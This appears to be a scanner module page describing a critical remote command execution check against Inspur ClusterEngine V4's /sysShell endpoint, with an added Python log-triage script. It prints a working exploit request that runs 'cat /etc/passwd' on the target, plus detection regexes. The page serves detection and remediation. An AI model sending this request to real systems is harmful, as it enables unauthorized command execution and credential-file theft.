
Inspur Clusterengine V4 SYSshell - Remote Command Execution

By kannthu

Critical
Vidoc Module
#inspur #clusterengine #rce
Description

What is "Inspur Clusterengine V4 SYSshell - Remote Command Execution"?

The "Inspur Clusterengine V4 SYSshell - Remote Command Execution" module detects a remote command execution vulnerability in the Inspur Clusterengine V4 SYSshell software. The vulnerability is rated critical. The module targets systems running this software and checks whether they are vulnerable.

Impact

If successfully exploited, this vulnerability can allow an attacker to execute arbitrary commands on the target system. This can lead to unauthorized access, data theft, system compromise, and potential disruption of critical services.

How does the module work?

The module sends a POST request to the target system's "/sysShell" endpoint with specific parameters. It checks two matching conditions, both of which must hold, to determine whether the vulnerability is present:

- The response body must match the regular expression "root:.*:0:0:", indicating that it contains the root user's entry from the "/etc/passwd" file.
- The response status code must be 200, indicating a successful request.

If both conditions are met, the module reports the vulnerability, indicating that the target system is vulnerable to remote command execution.

Example HTTP request:

POST /sysShell HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: lang=cn

op=doPlease&node=cu01&command=cat+/etc/passwd

Note: Replace <Hostname> with the actual hostname of the target system.

It is crucial to address this vulnerability promptly by applying the necessary patches or updates provided by the software vendor. Regular security assessments and monitoring can help detect and mitigate such vulnerabilities before they are exploited.
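For the monitoring side, the following added example (not part of the Vidoc module or of any vendor code) flags captured requests that have the shape shown above and re-implements the module's two matching conditions for reviewing logged responses. The sample requests, the host name `cluster.example.internal` and all function names are constructed for illustration, and it assumes a proxy or WAF that logs request bodies.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample captures, as a body-logging reverse proxy might store them.
SAMPLE_REQUESTS = [
    "POST /sysShell HTTP/1.1\r\nHost: cluster.example.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded;charset=UTF-8\r\n"
    "Cookie: lang=cn\r\n\r\nop=doPlease&node=cu01&command=cat+/etc/passwd",
    "GET /login HTTP/1.1\r\nHost: cluster.example.internal\r\n\r\n",
    "POST /sysShell HTTP/1.1\r\nHost: cluster.example.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\nop=status&node=cu01",
]

# The body matcher listed in the module preview.
PASSWD_ROOT = re.compile(r"root:.*:0:0:")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path and decoded form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0].split(" ")
    if len(request_line) != 3:
        return None  # malformed request line: nothing to classify
    method, target, _version = request_line
    # parse_qs decodes '+' and %XX escapes, so encoded variants compare equal.
    fields = parse_qs(body, keep_blank_values=True)
    return method.upper(), urlsplit(target).path, fields

def is_sysshell_command(raw):
    """True for a POST to /sysShell carrying op=doPlease and a command field."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    method, path, fields = parsed
    return (method == "POST" and path.rstrip("/") == "/sysShell"
            and "doPlease" in fields.get("op", [])
            and "command" in fields)

def response_matches(status, body):
    """The module's two matching conditions, combined with AND."""
    return status == 200 and PASSWD_ROOT.search(body) is not None

def triage(requests):
    """Return the indexes of captured requests that warrant investigation."""
    return [i for i, raw in enumerate(requests) if is_sysshell_command(raw)]

if __name__ == "__main__":
    print("suspicious request indexes:", triage(SAMPLE_REQUESTS))
```

A hit from `triage` only means the request shape was seen; pairing it with `response_matches` on the logged response separates probes against patched systems from requests that actually returned command output.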

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
regex: root:.*:0:0:
and
status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability